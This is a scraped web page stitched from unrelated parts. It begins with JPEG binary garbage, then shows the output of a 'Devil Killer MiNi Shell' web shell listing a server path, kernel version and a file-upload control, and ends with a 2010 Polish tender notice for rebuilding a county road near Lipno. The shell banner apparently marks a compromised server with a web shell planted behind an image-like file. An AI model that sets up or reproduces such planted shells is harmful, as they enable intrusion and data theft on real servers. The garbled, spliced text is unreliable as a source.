JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100618/173366-N-2010.html

<p class="kh_header"><b>Lipno: Przebudowa drogi powiatowej Nr 2706 C Sumin - Jankowo - Lipno.</b><br>
<b>Numer ogłoszenia: 173366 - 2010; data zamieszczenia: 18.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Wojska Polskiego 8, 87-600 Lipno, woj. kujawsko-pomorskie, tel. 054 2872046.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 2706 C Sumin - Jankowo - Lipno..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa drogi powiatowej Nr 2706 C Sumin - Jankowo - Lipno.
Zakres robót obejmuje :
-	profilowanie mieszanką mineralno - bitumiczną w ilości 75 kg/m2 celem uzyskania spadków na odcinku około 9300 mb,
-	 wykonanie warstwy ścieralnej z mieszanki mineralno - bitumicznej o grubości 4 cm na odcinku około 9300 mb,
-	na odcinku miejskim, tj. ulicy Wyszyńskiego w Lipnie wykonanie warstwy mineralno - bitumicznej SMA grubości 4 cm na odcinku około 900 mb, po uprzednim sfrezowaniu nawierzchni,
-	wykonanie czterech odcinków chodników o szerokości 2 m, zlokalizowanych przy krawędzi jezdni z jednoczesnym poszerzeniem jezdni do 5,5m,
-	roboty odwodnieniowe polegające na przebudowie istniejącego przepustu poprzez          
wymianę rur istniejących na rury o tej samej średnicy,
-	doprowadzenie poboczy gruntowych do wysokości umożliwiających swobodny spływ wód opadowych,
-	wymiana istniejących barier betonowych na stalowe energochłonne,
-	wykonanie zjazdów o zróżnicowanej nawierzchni w miejscach istniejących zjazdów.

Przebudowa drogi obejmuje odcinek od km 0+020 do km 15+000 o długości 14980 mb.  Odcinek drogi posiada zróżnicowany stan nawierzchni. W związku z tym przewidziano zróżnicowaną technologię. Przebudowa w swym zakresie obejmuje: 

1)	Odcinek pierwszy od km 0+020 do km 9+288,56
-	w zakresie nawierzchni na długości chodników projekt przewiduje wykonanie poszerzenia jezdni do 5,50 m, a na istniejącej nawierzchni wykonanie profilowania i ułożenia warstwy ścieralnej,
-	w zakresie poboczy projekt zakłada ich regulację wraz ze skarpami rowu,
-	lokalizacja chodników po stronie prawej:
.	od km 1+836,37 do km 2+021,55 (185,18mb),
.	od km 7+952,39 do km 8+071,53 (119,14 mb),
.	od km 8+981,52 do km 9+288,56 (307,04 mb).
2)	Odcinek drugi od km 9+288,56 do km 14+030,39
-	regulacja poboczy i wykonanie profilowania skarp rowu.
3)	Odcinek trzeci od km 14+030,39 do km 15+000
-	w zakresie nawierzchni na istniejącej nawierzchni wykonanie frezowania i ułożenie warstwy ścieralnej,
-	projekt zakłada wykonanie regulacji urządzeń obcych bez regulacji istniejących krawężników,
-	lokalizacja chodników po stronie prawej - od km 14+030,39 do km 14+135,00 (104,61 mb).
Konstrukcja:
1)	Nawierzchnia jezdni:
-	warstwa ścieralna z mieszanki mineralno-bitumicznej 0-11 o gr. 4,0 cm,
-	warstwa profilowana z mieszanki mineralno - bitumicznej 0-11 celem nadania spadków średnio 75 kg/m2,
-	istniejąca nawierzchnia bitumiczna.
2)	Poszerzenie nawierzchni jezdni:
-	warstwa ścieralna z mieszanki mineralno-bitumicznej 0-11 o gr. 4,0 cm,
-	warstwa profilowana z mieszanki mineralno - bitumicznej 0-11 celem nadania spadków średnio 75 kg/m2,
-	warstwa wiążąca z mieszanki mineralno - bitumicznej 0-11 o gr. 4,0 cm,
-	warstwa podbudowy z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
-	warstwa odcinająca z gruntu stabilizowanego cementem grubości 15 cm,
-	sprofilowane i zagęszczone podłoże gruntowe doprowadzone do G-1.
3)Konstrukcja chodników:
-	kostka betonowa drobno wymiarowa gr. 6 cm na podsypce cementowo-piaskowej,
-	podsypka piaskowa,
-	sprofilowane i zagęszczone podłoże gruntowe doprowadzone do G-1.
4)	Konstrukcja zjazdów w obrębie chodników:
-	kostka betonowa drobno wymiarowa gr. 8 cm na podsypce cementowo - piaskowej,
-	warstwa podbudowy z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
-	warstwa odcinająca z gruntu stabilizowanego cementem gr. 15 cm,
-	 sprofilowane i zagęszczone podłoże gruntowe doprowadzone do G-1.
5)	Konstrukcje zjazdów o nawierzchni bitumicznej:
-	warstwa ścieralna z mieszanki mineralno - bitumicznej 0-11 o gr. 4,0 cm,
-	warstwa wiążąca z mieszanki mineralno - bitumicznej 0-11 o gr. 4,0 cm,
-	warstwa podbudowy z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
-	warstwa odcinająca z gruntu stabilizowanego cementem gr. 15 cm,
-	 sprofilowane i zagęszczone podłoże gruntowe doprowadzone do G-1.
6)	Konstrukcja zjazdów gospodarczych:
-	warstwa podbudowy z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm,
-	warstwa odcinająca z gruntu stabilizowanego cementem grubości 15 cm,
-	sprofilowane i zagęszczone podłoże gruntowe doprowadzone do G-1.

 7.   Szczegółowy opis przedmiotu zamówienia i  zakres rzeczowy robót określają:
a)	projekt budowlany wraz z przedmiarem robót
b)  kosztorys ofertowy   
b)	szczegółowe specyfikacje techniczne wykonania i odbioru robót 

8. Wykonawca rozpocznie roboty od km 0+020 tj.  od skrzyżowania z drogą krajową nr 10 Toruń - Lipno - Sierpc,  zachowując ciągłość robót zgodnie z kilometracją w kierunku miejscowości Lipno, z pełnym zakresem robót wynikających z projektu budowlanego, 
 
9.   W ramach realizacji zadania Wykonawca zobowiązany jest również do:
.	wykonania projektu tymczasowej organizacji ruchu na czas wykonywania robót wraz z uzyskaniem niezbędnych opinii i zatwierdzenia;
.	zapewnienia znaków niezbędnych do wprowadzenia oznakowania tymczasowej organizacji ruchu na czas prowadzenia robót zgodnie z zatwierdzonymi projektami wraz z ustawieniem.
.	wykonawca  na czas wykonywania robót umieści tablice informacyjne zawierające informacje o współfinansowaniu robót przez Unię Europejską, które niezwłocznie  po  zakończeniu robót zastąpi  tablicami pamiątkowymi.
.	treść oraz sposób wykonania tablic informacyjnych i pamiątkowych musi być  zgodna z zapisami rozporządzania (We) nr 1080/2006 oraz rozporządzenia Komisji (WE) nr 1828/2006, Wytycznych Ministerstwa Rozwoju Regionalnego z 13 sierpnia 2007 roku w zakresie informacji i promocji (MRR/H/13(1)08/2007) oraz szczegółowych Wytycznych  Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Kujawsko - Pomorskiego na lata 2007 - 2013.
.	projekt tablic informacyjnych oraz pamiątkowych Wykonawca uzgodni z Zamawiającym.
.	tablice informacyjne oraz pamiątkowe Wykonawca  umieści na początku i końcu przebudowywanego odcinka drogi.
.	w kosztorysie ofertowym nie ujęto  kosztu zakupu i ustawienia tablic informacyjnych i pamiątkowych.  Wykonawca wkalkuluje w/w koszt  w cenę oferty. 

   10.    Wymaga się od Wykonawcy sprawdzenia w terenie warunków wykonania zamówienia.
   11.    Wymagany termin gwarancji na przedmiot zamówienia wynosi 3 lata..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.31.20-6, 45.23.32.60-9, 45.23.31.24-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Oferta musi być zabezpieczona wadium w wysokości :  
        109 580,00 zł (słownie: sto dziewięć tysięcy pięćset osiemdziesiąt złotych).
2.    Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej    z tym  że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2     ustawy z dn. 9 listopada 2000 o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. Nr 42  poz., 275 , z późn. zm);
3.   Wadium w formie pieniężnej należy wnieść na rachunek bankowy  Zarządu Dróg     
      Powiatowych w Lipnie prowadzony przez   Bank Spółdzielczy w Lipnie,                      
      ul. Mickiewicza 30 A   Nr   89 9542 0008 2001 0000 4037 0001 z adnotacją: 
     Wadium w postępowaniu na  wykonanie przebudowy drogi powiatowej Nr 2706 C
 Sumin - Jankowo - Lipno 
4.	Wadium wnoszone w formie poręczeń lub gwarancji, należy złożyć w oryginale w
 siedzibie  Zarządu Dróg Powiatowych w Lipnie, ul. Wojska Polskiego 8. 
        Do oferty nie należy załączać oryginału dokumentu wadialnego  - lecz jego kopię    
        potwierdzoną za zgodność z oryginałem.
 5.    Z treści gwarancji musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta.
        Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego)  
        przedstawiciela  Gwaranta. Podpis winien być sporządzony w sposób umożliwiający 
        jego identyfikację np. złożony   wraz z imienną pieczątką lub czytelny podpis 
        (z podaniem imienia i nazwiska).
6.    W przypadku przedłużenia przez Wykonawcę terminu związania ofertą, gwarant 
 zobowiązuje się przedłużyć okres ważności wadium na czas wskazany przez        
  wykonawcę, a jeżeli nie jest to  możliwe wystawić nowe wadium  na przedłużony okres               
 związania ofertą (art.85, pkt.2 i 4 ustawy Pzp)
  6.1.Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone
        przez  Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty 
        Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust.5 
        ustawy Pzp.
  7.   Wadium musi być wniesione najpóźniej do dnia: 09.07.2010r. do godz. 1000 
  8.   Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie j. w.     
       znajdzie się na rachunku  bankowym Zamawiającego.
  9.   Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą 
        wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za 
        odrzuconą.
10.   Zwrot  wadium 
10.1.	Zamawiający zwraca wadium wszystkim wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej  lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art.46 ust.4a ustawy Pzp. 
10.2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.;
10.3.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem  terminu składania ofert; 
11.	Zamawiający będzie żądał  ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium  na podstawie ust.10.1. niniejszej SIWZ  jeżeli w wyniku rozstrzygnięcia odwołania  jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
12.	 Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie  o którym mowa w  art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów, oświadczeń lub pełnomocnictw, chyba że udowodni  że wynika to z przyczyn nie leżących po jego stronie.
13.	Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z 
odsetkami  w przypadku, gdy Wykonawca: 
.	odmówi podpisania umowy na warunkach określonych w ofercie, 
.	nie wniesie zabezpieczenia należytego wykonania umowy, 
.	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony jeżeli wraz z ofertą wykonawca wykaże, że posiada  uprawnienia do wykonywania określonej działalności lub czynności związanej z przedmiotem  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku wykonawca wykaże, że w ciągu ostatnich pięciu lat wykonał co najmniej jeden kontrakt porównywalny z niniejszym przedmiotem zamówienia z podaniem jego wartości oraz daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty  zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Wykonawca winien wykazać, że wykonał w tym okresie, co najmniej 1 zamówienie, polegające na  przebudowie drogi obejmującej swoim zakresem ułożenie nawierzchni asfaltowej na odcinku długości minimum 10 000 mb, roboty odwodnieniowe, budowę chodników o pow. min. 600 m2 (potwierdzone referencjami lub dokumentami równoważnymi).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku wykonawca wykaże, że: 
a) dysponuje lub będzie dysponował, na podstawie pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji  odpowiedniego potencjału  technicznego do wykonania zamówienia tj. dysponuje w pełni   sprawnymi jednostkami  sprzętu i transportu zgodnie ze szczegółowymi specyfikacjami technicznymi ( wymagania minimalne):   

- Wytwórnia mas bitumicznych 	1 szt
- Układarka  mas bitumicznych z elektronicznym sterowaniem	1 szt
- Walce drogowe	3 szt
- Koparki o poj. łyżki min. 0,4 m3	3 szt
- Samochody samowyładowawcze	Wg potrzeb technologicznych
- Samojezdna ścinarka poboczy	1 szt
- Zagęszczarka	2 szt
- Frezarka	1 szt
- Szczotka mechaniczna do czyszczenia nawierzchni 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku wykonawca wykaże, że: 
a) dysponuje osobami zdolnymi do wykonania zamówienia tj. posiada do dyspozycji niezbędny potencjał kadrowy wykwalifikowany w celu obsadzenia podanych niżej stanowisk;  
- kierownik budowy o specjalności drogowej - 1 osoba,  wymagane kwalifikacje:  posiadanie uprawnień budowlanych  odpowiadające proponowanej funkcji w realizacji zamówienia  (dołączyć  oświadczenie, że osoba ta posiada odpowiednie uprawnienia o ile stosowne przepisy prawa nakładają obowiązek posiadania takiego uprawnienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie tego warunku wykonawca przedstawi opłaconą polisę,  a  w przypadku jej braku inny dokument potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia. Przedstawi  również informację banku lub spółdzielczej kasy oszczędnościowo -  kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy. 
Wypełniony kosztorys ofertowy.
Pełnomocnictwo zgodnie z art. 23 ustawy, jeżeli wykonawcy ubiegają się wspólnie o           udzielenie zamówienia (tylko, jeśli dotyczy);
Oświadczenie o spełnianie warunków udziału w postępowaniu zgodnie z art.44 ustawy;    
Upoważnienie do podpisywania oferty oraz innych dokumentów związanych 
z postępowaniem w sprawie zamówienia publicznego podpisane przez osoby  uprawnione do zaciągania zobowiązań w imieniu wykonawcy.
      UWAGA: Upoważnienie należy załączyć tylko wówczas, jeżeli osoba lub osoby          
      podpisujące ofertę nie figurują w odpowiednich rejestrach i nie są  uprawnione      
      do reprezentowania wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
